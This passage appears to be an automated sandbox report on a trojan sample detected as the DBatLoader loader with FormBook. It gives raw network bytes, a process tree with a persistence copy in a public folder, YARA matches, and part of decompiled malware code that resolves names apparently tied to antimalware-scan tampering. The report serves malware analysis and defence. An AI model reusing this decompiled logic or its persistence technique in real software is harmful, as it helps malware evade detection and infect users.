Q~&WC_A'2;-A=M0JG'hxxG7\b,n3'!Gy%\jq+00"JIADb{0LJ2UcK#\|PrK/K4w_ezm71x?+iMHbaU2QdW] "c>%2~~!3Q>e[acbr_
2022-11-29 09:41:52 UTC	156	IN	Data Raw: 32 8b b5 d7 29 c0 75 a5 75 aa 58 22 a1 4c ea 6d b7 59 8d a8 ef d9 6a 6c 0b ca bd 5c 12 59 71 6e 8f e6 bd 12 03 4b 03 79 52 72 6d c9 95 94 ce 5b de a2 ce ee 46 20 87 97 96 d4 91 dd 78 0b 2d ae 1b 49 0b b9 2d 87 36 6b 89 ff a3 72 a2 89 21 24 d5 2c 2c 5c 01 5f 72 98 fc 69 4e 3b 35 39 12 3f 2e 66 dc e8 d9 7d f9 c6 84 12 ab 80 f3 8e 35 b5 cc f2 13 ea 2e c5 b2 36 f0 3b aa 4a 14 6f 97 57 7e 0f c3 10 5f cf 39 be 9b 5b b7 2a af e4 2e e8 bd 21 12 b8 45 80 29 0c 69 ac b0 c6 9b 1e 68 92 e6 b7 01 80 5f a4 b3 e1 80 49 bc 47 c7 66 86 b2 23 0e df 85 28 72 bc b5 18 49 d8 f1 90 0f e6 3b f7 49 d7 86 87 47 e3 eb b6 4c 39 be 58 8a f7 e7 cb b1 01 ee d1 b3 85 f5 3c cb 40 16 eb 8f 13 fc 13 1d a9 56 c2 da 5d c4 c2 94 95 02 a3 d3 2a 58 25 40 05 4f 3a 2b f3 c9 5f 4e 96 51 30 f5 36 Data Ascii: 2)uuX"LmYjl\YqnKyRrm[F x-I-6kr!$,,\_riN;59?.f}5.6;JoW~_9[.!E)ih_IGf#(rI;IGL9X<@V]X%@O:+_NQ06
2022-11-29 09:41:52 UTC	172	IN	Data Raw: 2a 91 c9 cf b0 7f 8d 1b 61 13 66 2e 62 35 c6 34 bb b4 6a 46 57 aa 1a a0 fb 50 c4 c3 63 36 9e 01 a0 07 c0 d8 f1 a8 a4 fe 38 fb d8 e8 f6 66 f2 2c 35 f2 44 44 8c a8 eb d6 63 74 ae 6c 9c ec f0 e0 8f 8e 95 b0 d2 d3 ca 1e cc 9e 13 34 3d ce 5e bc 0f 70 eb 26 14 63 9b b4 43 5d fa 63 2c 23 fa d0 98 b8 d8 53 ac 9f 9f a1 5a e1 07 95 47 36 e3 d4 57 52 d3 0e a9 12 ef fd 71 11 f3 04 1b 61 1b 6d 86 a7 28 9e 0c aa df da 22 e0 83 d3 b5 ae 23 67 8b 56 11 64 72 b3 a6 7a 0a f3 aa 63 8f 1e 98 fd a0 50 b1 a3 04 07 e3 7d 07 6e 08 85 e2 0b bd 91 f9 0b e6 fe ec ad 03 8e 6e bf 28 2c 7a ed 7e 53 51 fd cf af 37 5d e5 42 4b bf de 64 09 82 fc fd 4f 52 1f 8f bd b0 c3 08 3b c3 99 6a e4 c2 77 c1 75 bf 31 d0 5b 5f f7 7b 38 aa 54 17 99 b9 b9 b9 d4 3b d4 b4 61 ea f7 af 76 63 ff fb 42 80 23 Data Ascii: *af.b54jFWPc68f,5DDctl4=^p&cC]c,#SZG6WRqam("#gVdrzcP}nn(,z~SQ7]BKdOR;jwu1[_{8T;avcB#

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exePID: 6024, Parent PID: 3452

General

Target ID:	0
Start time:	10:41:46
Start date:	29/11/2022
Path:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe
Imagebase:	0x400000
File size:	750592 bytes
MD5 hash:	F536EA8FB5B6586BB2FFC764CD52ABFF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.278011909.0000000002520000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.278530431.0000000002A2E000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: wscript.exePID: 5988, Parent PID: 6024

General

Target ID:	1
Start time:	10:41:52
Start date:	29/11/2022
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\wscript.exe
Imagebase:	0x850000
File size:	147456 bytes
MD5 hash:	7075DD7B9BE8807FCA93ACD86F724884
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.576405249.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.576405249.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.576405249.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.576405249.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.564946662.0000000004830000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.564946662.0000000004830000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.564946662.0000000004830000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.564946662.0000000004830000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: explorer.exePID: 3452, Parent PID: 5988

General

Target ID:	2
Start time:	10:41:56
Start date:	29/11/2022
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff69fe90000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: Iuigzwjd.exePID: 3208, Parent PID: 3452

General

Target ID:	12
Start time:	10:42:04
Start date:	29/11/2022
Path:	C:\Users\Public\Libraries\Iuigzwjd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Libraries\Iuigzwjd.exe"
Imagebase:	0x400000
File size:	750592 bytes
MD5 hash:	F536EA8FB5B6586BB2FFC764CD52ABFF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 15%, ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: wscript.exePID: 1264, Parent PID: 3208

General

Target ID:	13
Start time:	10:42:10
Start date:	29/11/2022
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\wscript.exe
Imagebase:	0x7ff68f300000
File size:	147456 bytes
MD5 hash:	7075DD7B9BE8807FCA93ACD86F724884
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: Iuigzwjd.exePID: 1848, Parent PID: 3452

General

Target ID:	14
Start time:	10:42:13
Start date:	29/11/2022
Path:	C:\Users\Public\Libraries\Iuigzwjd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Libraries\Iuigzwjd.exe"
Imagebase:	0x400000
File size:	750592 bytes
MD5 hash:	F536EA8FB5B6586BB2FFC764CD52ABFF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: wscript.exePID: 5044, Parent PID: 1848

General

Target ID:	15
Start time:	10:42:29
Start date:	29/11/2022
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\wscript.exe
Imagebase:	0x850000
File size:	147456 bytes
MD5 hash:	7075DD7B9BE8807FCA93ACD86F724884
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exePID: 6024, Parent PID: 3452COMMON

Execution Graph

Execution Coverage:	17.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	82%
Total number of Nodes:	1304
Total number of Limit Nodes:	17

Executed Functions

Function 02739128 Relevance: 124.7, APIs: 12, Strings: 57, Instructions: 3930
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 53%

			E02739128(void* __ebx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				intOrPtr _v44;
				char _v48;
				char _v52;
				char _v56;
				intOrPtr _v60;
				char _v64;
				char _v68;
				char _v72;
				intOrPtr _v76;
				char _v80;
				char _v84;
				char _v88;
				intOrPtr _v92;
				char _v96;
				char _v100;
				char _v104;
				intOrPtr _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				intOrPtr _v128;
				char _v132;
				char _v136;
				char _v140;
				intOrPtr _v144;
				char _v148;
				char _v152;
				char _v156;
				intOrPtr _v160;
				char _v164;
				char _v168;
				char _v172;
				intOrPtr _v176;
				char _v180;
				char _v184;
				char _v188;
				intOrPtr* _v192;
				char _v196;
				intOrPtr _v200;
				char _v204;
				char _v208;
				char _v212;
				char _v216;
				intOrPtr _v220;
				char _v224;
				char _v228;
				char _v232;
				intOrPtr _v236;
				char _v240;
				char _v244;
				char _v248;
				intOrPtr _v252;
				char _v256;
				char _v260;
				char _v264;
				intOrPtr _v268;
				char _v272;
				char _v276;
				char _v280;
				intOrPtr _v284;
				char _v288;
				char _v292;
				char _v296;
				intOrPtr _v300;
				char _v304;
				char _v308;
				char _v312;
				char _v316;
				char _v320;
				intOrPtr _v324;
				char _v328;
				char _v332;
				char _v336;
				intOrPtr _v340;
				char _v344;
				char _v348;
				char _v352;
				char _v356;
				intOrPtr _v360;
				char _v364;
				char _v368;
				char _v372;
				intOrPtr _v376;
				char _v380;
				char _v384;
				char _v388;
				char _v392;
				char _v396;
				char _v400;
				char _v404;
				char _v408;
				char _v412;
				char _v416;
				char _v420;
				char _v424;
				intOrPtr _v428;
				char _v432;
				char _v436;
				char _v440;
				intOrPtr _v444;
				char _v448;
				char _v452;
				char _v456;
				intOrPtr _v460;
				char _v464;
				char _v468;
				char _v472;
				intOrPtr _v476;
				char _v480;
				char _v484;
				char _v488;
				intOrPtr _v492;
				char _v496;
				char _v500;
				char _v504;
				intOrPtr _v508;
				char _v512;
				char _v516;
				char _v520;
				intOrPtr _v524;
				char _v528;
				char _v532;
				char _v536;
				intOrPtr _v540;
				char _v544;
				char _v548;
				char _v552;
				intOrPtr _v556;
				char _v560;
				char _v564;
				char _v568;
				char _v572;
				intOrPtr _v576;
				char _v580;
				char _v584;
				char _v588;
				char _v592;
				intOrPtr _v596;
				char _v600;
				char _v604;
				char _v608;
				char _v612;
				char _v616;
				intOrPtr _v620;
				char _v624;
				char _v628;
				char _v632;
				intOrPtr _v636;
				char _v640;
				char _v644;
				char _v648;
				intOrPtr _v652;
				char _v656;
				char _v660;
				char _v664;
				intOrPtr _v668;
				char _v672;
				char _v676;
				char _v680;
				intOrPtr _v684;
				char _v688;
				char _v692;
				char _v696;
				char _v700;
				char _v704;
				intOrPtr _v708;
				char _v712;
				char _v716;
				char _v720;
				intOrPtr _v724;
				char _v728;
				char _v732;
				char _v736;
				intOrPtr _v740;
				char _v744;
				char _v748;
				char _v752;
				intOrPtr _v756;
				char _v760;
				char _v764;
				char _v768;
				intOrPtr _v772;
				char _v776;
				char _v780;
				intOrPtr _v784;
				char _v788;
				char _v792;
				char _v796;
				intOrPtr _v800;
				char _v804;
				char _v808;
				char _v812;
				intOrPtr _v816;
				char _v820;
				char _v824;
				char _v828;
				intOrPtr _v832;
				char _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				intOrPtr _v852;
				char _v856;
				char _v860;
				char _v864;
				intOrPtr _v868;
				char _v872;
				char _v876;
				char _v880;
				intOrPtr _v884;
				char _v888;
				char _v892;
				char _v896;
				intOrPtr _v900;
				char _v904;
				char _v908;
				char _v912;
				intOrPtr _v916;
				char _v920;
				char _v924;
				char _v928;
				intOrPtr _v932;
				char _v936;
				char _v940;
				char _v944;
				intOrPtr _v948;
				char _v952;
				char _v956;
				char _v960;
				char _v964;
				intOrPtr _v968;
				char _v972;
				char _v976;
				char _v980;
				intOrPtr _v984;
				char _v988;
				char _v992;
				char _v996;
				intOrPtr _v1000;
				char _v1004;
				char _v1008;
				char _v1012;
				intOrPtr _v1016;
				char _v1020;
				char _v1024;
				intOrPtr _v1028;
				char _v1032;
				intOrPtr _v1036;
				char _v1040;
				char _v1044;
				char _v1048;
				intOrPtr _v1052;
				char _v1056;
				char _v1060;
				char _v1064;
				char _v1068;
				char _v1072;
				char _v1076;
				intOrPtr _v1080;
				char _v1084;
				char _v1088;
				char _v1092;
				intOrPtr _v1096;
				char _v1100;
				char _v1104;
				char _v1108;
				char _v1112;
				intOrPtr _v1116;
				char _v1120;
				char _v1124;
				char _v1128;
				intOrPtr _v1132;
				char _v1136;
				char _v1140;
				char _v1144;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				intOrPtr _v1164;
				char _v1168;
				char _v1172;
				void* _v1176;
				char _v1180;
				char _v1184;
				char _v1188;
				char _v1192;
				char _v1196;
				intOrPtr _v1200;
				char _v1204;
				char _v1240;
				intOrPtr _v1244;
				char _v1248;
				char _v1252;
				char _v1256;
				intOrPtr _v1260;
				char _v1264;
				char _v1268;
				char _v1272;
				intOrPtr _v1276;
				char _v1280;
				char _v1284;
				char _v1288;
				intOrPtr _v1292;
				char _v1296;
				char _v1300;
				char _v1304;
				char _v1308;
				intOrPtr _v1312;
				char _v1316;
				char _v1320;
				char _v1324;
				intOrPtr _v1328;
				char _v1332;
				char _v1336;
				char _v1340;
				char _v1344;
				intOrPtr _v1348;
				char _v1352;
				char _v1356;
				char _v1360;
				intOrPtr _v1364;
				char _v1368;
				char _v1372;
				char _v1376;
				char _v1380;
				char _v1384;
				intOrPtr _v1388;
				char _v1392;
				char _v1396;
				char _v1400;
				intOrPtr _v1404;
				char _v1408;
				char _v1412;
				char _v1416;
				intOrPtr _v1420;
				char _v1424;
				char _v1428;
				char _v1432;
				intOrPtr _v1436;
				char _v1440;
				char _v1444;
				intOrPtr _v1448;
				char _v1452;
				char _v1456;
				char _v1460;
				intOrPtr _v1464;
				char _v1468;
				char _v1472;
				char _v1476;
				char _v1480;
				intOrPtr _v1484;
				char _v1832;
				char _v2092;
				char _v2104;
				char _v2132;
				intOrPtr _v2136;
				char _v2140;
				char _v2144;
				char _v2148;
				intOrPtr _v2152;
				char _v2156;
				char _v2160;
				char _v2164;
				intOrPtr _v2168;
				char _v2172;
				char _v2176;
				char _v2180;
				intOrPtr _v2184;
				char _v2188;
				char _v2192;
				char _v2196;
				char _v2200;
				intOrPtr _v2204;
				char _v2208;
				char _v2212;
				char _v2216;
				intOrPtr _v2220;
				char _v2224;
				char _v2228;
				char _v2232;
				char _v2236;
				intOrPtr _v2240;
				char _v2244;
				char _v2248;
				char _v2252;
				intOrPtr _v2256;
				char _v2260;
				char _v2264;
				char _v2268;
				intOrPtr _v2272;
				char _v2276;
				char _v2280;
				char _v2284;
				intOrPtr _v2288;
				char _v2292;
				char _v2296;
				char _v2300;
				intOrPtr _v2304;
				char _v2308;
				char _v2312;
				char _v2316;
				intOrPtr _v2320;
				char _v2324;
				char _v2328;
				char _v2332;
				intOrPtr _v2336;
				char _v2340;
				char _v2344;
				char _v2348;
				intOrPtr _v2352;
				char _v2356;
				char _v2360;
				char _v2364;
				intOrPtr _v2368;
				char _v2372;
				char _v2376;
				char _v2380;
				intOrPtr _v2384;
				char _v2388;
				char _v2392;
				char _v2396;
				intOrPtr _v2400;
				char _v2404;
				char _v2408;
				char _v2412;
				intOrPtr _v2416;
				char _v2420;
				char _v2424;
				char _v2428;
				intOrPtr _v2432;
				char _v2436;
				char _v2440;
				char _v2444;
				intOrPtr _v2448;
				char _v2452;
				char _v2456;
				char _v2460;
				char _v2464;
				intOrPtr _v2468;
				char _v2472;
				char _v2476;
				char _v2480;
				intOrPtr _v2484;
				char _v2488;
				char _v2492;
				char _v2496;
				char _v2500;
				char _v2504;
				char _v2508;
				char _v2512;
				intOrPtr _v2516;
				char _v2520;
				char _v2524;
				char _v2528;
				intOrPtr _v2532;
				char _v2536;
				char _v2540;
				char _v2544;
				intOrPtr _v2548;
				char _v2552;
				char _v2556;
				char _v2560;
				char _v2564;
				char _v2568;
				char _v2572;
				char _v2576;
				intOrPtr _v2580;
				char _v2584;
				char _v2588;
				char _v2592;
				char _v2596;
				char _v2600;
				char _v2604;
				char _v2608;
				intOrPtr _v2612;
				char _v2616;
				char _v2620;
				char _v2624;
				intOrPtr _v2628;
				char _v2632;
				char _v2636;
				char _v2640;
				intOrPtr _v2644;
				char _v2648;
				char _v2652;
				char _v2656;
				intOrPtr _v2660;
				char _v2664;
				char _v2668;
				char _v2672;
				char _v2676;
				char _v2680;
				intOrPtr _v2684;
				char _v2688;
				char _v2692;
				char _v2696;
				char _v2700;
				char _v2704;
				char _v2708;
				char _v2712;
				char _v2716;
				char _v2720;
				intOrPtr _v2724;
				char _v2728;
				char _v2732;
				char _v2736;
				char _v2740;
				char _v2744;
				char _v2748;
				char _v2752;
				char _v2756;
				char _v2760;
				char _v2764;
				char _v2768;
				char _v2772;
				char _v2776;
				char _v2780;
				char _v2784;
				char _v2788;
				char _v2792;
				char _v2796;
				char _v2800;
				char _v2804;
				char _v2808;
				char _v2812;
				char _v2816;
				char _v2820;
				char _v2824;
				char _v2828;
				char _v2832;
				intOrPtr _v2836;
				char _v2840;
				char _v2844;
				char _v2848;
				char _v2852;
				char _v2856;
				char _v2860;
				char _v2864;
				char _v2868;
				char _v2872;
				char _v2876;
				char _v2880;
				char _v2884;
				char _v2888;
				char _v2892;
				char _v2896;
				char _v2900;
				void* _t1159;
				intOrPtr* _t1161;
				intOrPtr* _t1320;
				intOrPtr _t1321;
				intOrPtr _t1337;
				void* _t1342;
				char* _t1390;
				intOrPtr _t1399;
				void* _t1403;
				intOrPtr _t1408;
				void* _t1443;
				intOrPtr _t1444;
				intOrPtr _t1476;
				intOrPtr _t1578;
				signed char _t1579;
				intOrPtr _t1632;
				void* _t1633;
				intOrPtr _t1634;
				intOrPtr _t1652;
				intOrPtr _t1672;
				intOrPtr _t1770;
				intOrPtr _t1776;
				intOrPtr _t1777;
				intOrPtr _t1835;
				intOrPtr _t1893;
				intOrPtr _t1925;
				void* _t1926;
				intOrPtr _t1927;
				intOrPtr _t1959;
				intOrPtr _t2007;
				intOrPtr _t2037;
				intOrPtr _t2067;
				intOrPtr _t2097;
				void* _t2240;
				intOrPtr _t2302;
				intOrPtr _t2311;
				intOrPtr _t2320;
				intOrPtr _t2329;
				intOrPtr _t2338;
				intOrPtr _t2347;
				intOrPtr _t2356;
				intOrPtr _t2365;
				intOrPtr _t2374;
				intOrPtr _t2383;
				intOrPtr _t2392;
				intOrPtr _t2401;
				intOrPtr _t2424;
				intOrPtr _t2433;
				intOrPtr _t2442;
				intOrPtr _t2451;
				intOrPtr _t2460;
				intOrPtr _t2469;
				intOrPtr _t2478;
				intOrPtr _t2486;
				intOrPtr _t2488;
				intOrPtr* _t2491;
				intOrPtr _t2511;
				intOrPtr _t2513;
				intOrPtr* _t2516;
				void* _t2535;
				void* _t2536;
				intOrPtr _t2540;
				intOrPtr _t2542;
				intOrPtr _t2605;
				long _t2639;
				void* _t2669;
				intOrPtr* _t2714;
				void* _t2745;
				void* _t2761;
				intOrPtr* _t2784;
				intOrPtr* _t2788;
				intOrPtr* _t2824;
				intOrPtr* _t2831;
				intOrPtr _t2834;
				intOrPtr _t2836;
				intOrPtr _t2962;
				intOrPtr _t3054;
				CHAR* _t3055;
				intOrPtr _t3097;
				intOrPtr* _t3160;
				intOrPtr* _t3163;
				intOrPtr* _t3171;
				intOrPtr* _t3179;
				intOrPtr _t3181;
				intOrPtr* _t3188;
				intOrPtr _t3191;
				intOrPtr _t3235;
				intOrPtr _t3239;
				intOrPtr _t3241;
				intOrPtr _t3247;
				char* _t3337;
				intOrPtr _t3346;
				intOrPtr _t3376;
				intOrPtr* _t3377;
				intOrPtr _t3378;
				intOrPtr* _t3380;
				intOrPtr* _t3381;
				void* _t3383;
				intOrPtr _t3384;
				intOrPtr _t3385;
				intOrPtr _t3386;
				intOrPtr _t3387;
				intOrPtr _t3388;
				intOrPtr _t3389;
				intOrPtr _t3390;
				intOrPtr _t3391;
				intOrPtr _t3392;
				intOrPtr _t3393;
				intOrPtr _t3394;
				intOrPtr _t3397;
				intOrPtr _t3398;
				intOrPtr _t3399;
				intOrPtr _t3400;
				intOrPtr _t3403;
				intOrPtr _t3404;
				intOrPtr _t3405;
				intOrPtr _t3407;
				intOrPtr _t3408;
				intOrPtr _t3409;
				intOrPtr _t3410;
				intOrPtr _t3411;
				intOrPtr _t3412;
				intOrPtr _t3413;
				intOrPtr _t3414;
				intOrPtr _t3415;
				intOrPtr _t3418;
				intOrPtr _t3420;
				intOrPtr _t3421;
				intOrPtr _t3423;
				intOrPtr _t3424;
				intOrPtr _t3425;
				intOrPtr _t3426;
				intOrPtr _t3427;
				intOrPtr _t3428;
				intOrPtr _t3431;
				intOrPtr _t3432;
				intOrPtr _t3433;
				intOrPtr _t3434;
				intOrPtr _t3435;
				intOrPtr _t3436;
				intOrPtr _t3437;
				intOrPtr _t3438;
				intOrPtr _t3440;
				intOrPtr _t3441;
				intOrPtr _t3443;
				intOrPtr _t3444;
				intOrPtr _t3445;
				intOrPtr _t3446;
				intOrPtr _t3447;
				intOrPtr _t3448;
				intOrPtr _t3449;
				intOrPtr _t3450;
				intOrPtr _t3451;
				intOrPtr _t3452;
				intOrPtr _t3453;
				intOrPtr _t3454;
				intOrPtr _t3455;
				intOrPtr _t3456;
				intOrPtr _t3457;
				intOrPtr _t3458;
				intOrPtr _t3459;
				intOrPtr _t3460;
				intOrPtr _t3461;
				intOrPtr _t3462;
				intOrPtr _t3463;
				intOrPtr _t3464;
				intOrPtr _t3465;
				intOrPtr _t3466;
				intOrPtr _t3467;
				intOrPtr _t3468;
				intOrPtr _t3469;
				intOrPtr _t3470;
				intOrPtr _t3471;
				intOrPtr _t3472;
				intOrPtr _t3473;
				intOrPtr _t3474;
				intOrPtr _t3475;
				intOrPtr _t3476;
				intOrPtr _t3477;
				intOrPtr _t3478;
				intOrPtr _t3479;
				intOrPtr _t3480;
				intOrPtr _t3482;
				intOrPtr _t3483;
				intOrPtr _t3484;
				intOrPtr _t3485;
				intOrPtr _t3490;
				intOrPtr _t3491;
				intOrPtr _t3492;
				intOrPtr _t3493;
				intOrPtr _t3494;
				intOrPtr _t3495;
				intOrPtr _t3496;
				intOrPtr _t3497;
				intOrPtr _t3498;
				intOrPtr _t3499;
				intOrPtr _t3500;
				intOrPtr _t3501;
				intOrPtr _t3502;
				intOrPtr _t3503;
				intOrPtr _t3504;
				intOrPtr _t3505;
				intOrPtr _t3507;
				intOrPtr _t3508;
				intOrPtr _t3509;
				intOrPtr _t3510;
				intOrPtr _t3520;
				intOrPtr _t3521;
				intOrPtr _t3522;
				intOrPtr _t3523;
				intOrPtr _t3524;
				intOrPtr _t3525;
				intOrPtr _t3526;
				intOrPtr _t3528;
				void* _t3534;
				void* _t3539;
				void* _t3544;
				void* _t3549;
				void* _t3554;
				void* _t3559;
				void* _t3566;
				void* _t3572;
				void* _t3578;
				void* _t3583;
				void* _t3591;
				void* _t3597;
				void* _t3602;
				void* _t3607;
				void* _t3619;
				void* _t3626;
				void* _t3633;
				void* _t3638;
				void* _t3644;
				void* _t3649;
				void* _t3654;
				void* _t3659;
				void* _t3664;
				void* _t3670;
				void* _t3675;
				intOrPtr _t3676;
				intOrPtr _t3687;
				intOrPtr _t3689;
				void* _t3697;
				void* _t3704;
				void* _t3711;
				intOrPtr _t3712;
				void* _t3741;
				void* _t3746;
				void* _t3751;
				void* _t3756;
				void* _t3761;
				void* _t3769;
				void* _t3774;
				void* _t3779;
				void* _t3784;
				void* _t3790;
				void* _t3795;
				void* _t3800;
				void* _t3805;
				intOrPtr _t3806;
				void* _t3812;
				void* _t3817;
				void* _t3824;
				void* _t3829;
				void* _t3837;
				void* _t3842;
				void* _t3847;
				void* _t3853;
				void* _t3858;
				void* _t3864;
				void* _t3869;
				void* _t3875;
				void* _t3880;
				void* _t3886;
				void* _t3891;
				void* _t3896;
				void* _t3899;
				void* _t3902;
				void* _t3907;
				void* _t3910;
				void* _t3913;
				void* _t3918;
				void* _t3923;
				void* _t3928;
				void* _t3933;
				void* _t3937;
				void* _t3942;
				void* _t3945;
				void* _t3948;
				void* _t3951;
				void* _t3956;
				void* _t3959;
				void* _t3962;
				void* _t3965;
				void* _t3968;
				void* _t3971;
				void* _t3974;
				void* _t3977;
				void* _t3980;
				void* _t3983;
				void* _t3986;
				void* _t3989;
				void* _t3992;
				void* _t3997;
				void* _t4000;
				void* _t4003;
				void* _t4006;
				void* _t4009;
				void* _t4012;
				void* _t4015;
				void* _t4018;
				void* _t4026;
				void* _t4034;
				void* _t4044;
				void* _t4049;
				void* _t4055;
				void* _t4060;
				void* _t4067;
				void* _t4072;
				void* _t4077;
				void* _t4082;
				void* _t4087;
				void* _t4092;
				void* _t4097;
				void* _t4102;
				void* _t4107;
				void* _t4113;
				void* _t4118;
				void* _t4127;
				void* _t4132;
				intOrPtr _t4139;
				void* _t4147;
				void* _t4152;
				void* _t4157;
				void* _t4162;
				void* _t4169;
				void* _t4174;
				void* _t4179;
				void* _t4184;
				void* _t4189;
				void* _t4194;
				void* _t4199;
				void* _t4204;
				void* _t4211;
				void* _t4216;
				void* _t4220;
				void* _t4225;
				void* _t4230;
				void* _t4237;
				void* _t4242;
				void* _t4248;
				void* _t4253;
				intOrPtr _t4267;
				void* _t4272;
				void* _t4277;
				void* _t4282;
				void* _t4290;
				void* _t4293;
				void* _t4296;
				void* _t4299;
				void* _t4304;
				void* _t4309;
				void* _t4314;
				void* _t4319;
				intOrPtr _t4320;
				void* _t4328;
				intOrPtr _t4329;
				void* _t4332;
				intOrPtr _t4336;
				intOrPtr _t4337;
				intOrPtr* _t4345;
				void* _t4354;

				_t4354 = __fp0;
				_t4332 = __edi;
				_t3375 = __ebx;
				_t4336 = _t4337;
				_t3383 = 0x16a;
				goto L1;
				L7:
				_push(0x273e77c);
				_push( *0x2744bb0);
				_push("OpenSession");
				E02724C24();
				E02724A98( &_v8, E02724D64(_v12));
				_push(_v8);
				_t3384 =  *0x2744bb0; // 0x2b81b38
				E02724BB0( &_v20, _t3384, 0x273e77c);
				E02724A98( &_v16, E02724D64(_v20));
				_pop(_t3534); // executed
				E02733690(_v16, _t3375, _t3534, 0x2744b88); // executed
				_push(0x273e77c);
				_push( *0x2744bb0);
				_push("ScanString");
				E02724C24();
				E02724A98( &_v24, E02724D64(_v28));
				_push(_v24);
				_t3385 =  *0x2744bb0; // 0x2b81b38
				E02724BB0( &_v36, _t3385, 0x273e77c);
				E02724A98( &_v32, E02724D64(_v36));
				_pop(_t3539); // executed
				E02733690(_v32, _t3375, _t3539, 0x2744b88); // executed
				_push(0x273e77c);
				_push( *0x2744bb0);
				_push("Initialize");
				E02724C24();
				E02724A98( &_v40, E02724D64(_v44));
				_push(_v40);
				_t3386 =  *0x2744bb0; // 0x2b81b38
				E02724BB0( &_v52, _t3386, 0x273e77c);
				E02724A98( &_v48, E02724D64(_v52));
				_pop(_t3544); // executed
				E02733690(_v48, _t3375, _t3544, 0x2744b88); // executed
				_push(0x273e77c);
				_push( *0x2744bb0);
				_push("ScanBuffer");
				E02724C24();
				E02724A98( &_v56, E02724D64(_v60));
				_push(_v56);
				_t3387 =  *0x2744bb0; // 0x2b81b38
				E02724BB0( &_v68, _t3387, 0x273e77c);
				E02724A98( &_v64, E02724D64(_v68));
				_pop(_t3549); // executed
				E02733690(_v64, _t3375, _t3549, 0x2744b88); // executed
				_push(0x273e77c);
				_push( *0x2744bb0);
				_push("Initialize");
				E02724C24();
				E02724A98( &_v72, E02724D64(_v76));
				_push(_v72);
				_t3388 =  *0x2744bb0; // 0x2b81b38
				E02724BB0( &_v84, _t3388, 0x273e77c);
				E02724A98( &_v80, E02724D64(_v84));
				_pop(_t3554); // executed
				E02733690(_v80, _t3375, _t3554, 0x2744b88); // executed
				_push(0x273e77c);
				_push( *0x2744bb0);
				_push("OpenSession");
				E02724C24();
				E02724A98( &_v88, E02724D64(_v92));
				_push(_v88);
				_t3389 =  *0x2744bb0; // 0x2b81b38
				E02724BB0( &_v100, _t3389, 0x273e77c);
				E02724A98( &_v96, E02724D64(_v100));
				_pop(_t3559); // executed
